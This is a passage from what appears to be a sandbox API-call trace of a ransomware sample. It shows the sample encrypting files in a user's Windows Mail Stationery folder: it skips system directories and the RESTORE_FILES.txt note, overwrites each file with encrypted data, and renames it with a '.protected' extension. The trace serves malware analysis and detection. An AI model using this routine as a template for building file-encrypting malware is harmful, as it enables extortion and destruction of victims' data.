Mail\\Stationery\\Peacock.jpg") returned 93 [0085.665] StrStrW (lpFirst="Peacock.jpg", lpSrch=".txt") returned 0x0 [0085.665] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 93 [0085.665] StrStrW (lpFirst="Peacock.jpg", lpSrch=".rar") returned 0x0 [0085.665] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 93 [0085.665] StrStrW (lpFirst="Peacock.jpg", lpSrch=".zip") returned 0x0 [0085.665] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x13fb, lpOverlapped=0x0) returned 1 [0085.750] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffec05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.750] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x13fb, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x13fb, lpOverlapped=0x0) returned 1 [0085.783] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.783] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.783] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.783] CloseHandle (hObject=0x150) returned 1 [0085.784] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.protected") returned 103 [0085.784] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg.protected")) returned 1 [0085.785] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.785] lstrcmpiW (lpString1="Roses.htm", lpString2="Windows") returned -1 [0085.785] lstrcmpiW (lpString1="Roses.htm", lpString2="Program Files") returned 1 [0085.785] lstrcmpiW (lpString1="Roses.htm", lpString2="Program Files (x86)") returned 1 [0085.785] lstrcmpiW (lpString1="Roses.htm", lpString2="$Recycle.bin") returned 1 [0085.785] lstrcmpiW (lpString1="Roses.htm", lpString2="System Volume Information") returned -1 [0085.785] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 91 [0085.785] StrStrIW (lpFirst="Roses.htm", lpSrch=".protected") returned 0x0 [0085.785] lstrcmpW (lpString1="Roses.htm", lpString2="RESTORE_FILES.txt") returned 1 [0085.785] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.785] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.786] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 91 [0085.786] StrStrW (lpFirst="Roses.htm", lpSrch=".txt") returned 0x0 [0085.786] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 91 [0085.786] StrStrW (lpFirst="Roses.htm", lpSrch=".rar") returned 0x0 [0085.786] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 91 [0085.786] StrStrW (lpFirst="Roses.htm", lpSrch=".zip") returned 0x0 [0085.786] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xe9, lpOverlapped=0x0) returned 1 [0085.787] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.787] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe9, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xe9, lpOverlapped=0x0) returned 1 [0085.788] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.788] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.788] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.788] CloseHandle (hObject=0x150) returned 1 [0085.789] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.protected") returned 101 [0085.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm.protected")) returned 1 [0085.789] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.790] lstrcmpiW (lpString1="Roses.jpg", lpString2="Windows") returned -1 [0085.790] lstrcmpiW (lpString1="Roses.jpg", lpString2="Program Files") returned 1 [0085.790] lstrcmpiW (lpString1="Roses.jpg", lpString2="Program Files (x86)") returned 1 [0085.790] lstrcmpiW (lpString1="Roses.jpg", lpString2="$Recycle.bin") returned 1 [0085.790] lstrcmpiW (lpString1="Roses.jpg", lpString2="System Volume Information") returned -1 [0085.790] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 91 [0085.790] StrStrIW (lpFirst="Roses.jpg", lpSrch=".protected") returned 0x0 [0085.790] lstrcmpW (lpString1="Roses.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0085.790] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.790] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 91 [0085.791] StrStrW (lpFirst="Roses.jpg", lpSrch=".txt") returned 0x0 [0085.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 91 [0085.791] StrStrW (lpFirst="Roses.jpg", lpSrch=".rar") returned 0x0 [0085.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 91 [0085.791] StrStrW (lpFirst="Roses.jpg", lpSrch=".zip") returned 0x0 [0085.791] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x780, lpOverlapped=0x0) returned 1 [0085.800] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff880, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.800] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x780, lpOverlapped=0x0) returned 1 [0085.801] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.801] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.801] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.801] CloseHandle (hObject=0x150) returned 1 [0085.802] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.protected") returned 101 [0085.802] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg.protected")) returned 1 [0085.804] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.804] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Windows") returned -1 [0085.804] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Program Files") returned 1 [0085.804] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Program Files (x86)") returned 1 [0085.804] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="$Recycle.bin") returned 1 [0085.804] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="System Volume Information") returned -1 [0085.804] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 100 [0085.804] StrStrIW (lpFirst="Shades of Blue.htm", lpSrch=".protected") returned 0x0 [0085.804] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="RESTORE_FILES.txt") returned 1 [0085.804] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.804] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.805] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 100 [0085.805] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".txt") returned 0x0 [0085.805] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 100 [0085.805] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".rar") returned 0x0 [0085.805] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 100 [0085.805] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".zip") returned 0x0 [0085.805] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0085.806] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.806] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0085.807] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.807] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.807] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.807] CloseHandle (hObject=0x150) returned 1 [0085.808] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.protected") returned 110 [0085.808] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm.protected")) returned 1 [0085.809] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.809] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Windows") returned -1 [0085.809] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Program Files") returned 1 [0085.809] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Program Files (x86)") returned 1 [0085.809] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="$Recycle.bin") returned 1 [0085.809] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="System Volume Information") returned -1 [0085.809] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 98 [0085.810] StrStrIW (lpFirst="ShadesOfBlue.jpg", lpSrch=".protected") returned 0x0 [0085.810] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0085.810] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.810] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.810] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 98 [0085.810] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".txt") returned 0x0 [0085.810] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 98 [0085.810] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".rar") returned 0x0 [0085.810] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 98 [0085.810] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".zip") returned 0x0 [0085.810] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x127e, lpOverlapped=0x0) returned 1 [0085.818] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffed82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.818] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x127e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x127e, lpOverlapped=0x0) returned 1 [0085.819] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.819] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.819] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.819] CloseHandle (hObject=0x150) returned 1 [0085.820] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.protected") returned 108 [0085.820] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.protected")) returned 1 [0085.821] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.821] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Windows") returned -1 [0085.821] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Program Files") returned 1 [0085.821] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Program Files (x86)") returned 1 [0085.821] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="$Recycle.bin") returned 1 [0085.821] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="System Volume Information") returned -1 [0085.821] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 95 [0085.821] StrStrIW (lpFirst="Soft Blue.htm", lpSrch=".protected") returned 0x0 [0085.821] lstrcmpW (lpString1="Soft Blue.htm", lpString2="RESTORE_FILES.txt") returned 1 [0085.821] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.821] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 95 [0085.822] StrStrW (lpFirst="Soft Blue.htm", lpSrch=".txt") returned 0x0 [0085.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 95 [0085.822] StrStrW (lpFirst="Soft Blue.htm", lpSrch=".rar") returned 0x0 [0085.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 95 [0085.822] StrStrW (lpFirst="Soft Blue.htm", lpSrch=".zip") returned 0x0 [0085.822] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0085.823] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.823] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0085.824] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.824] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.824] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.824] CloseHandle (hObject=0x150) returned 1 [0085.825] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.protected") returned 105 [0085.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows 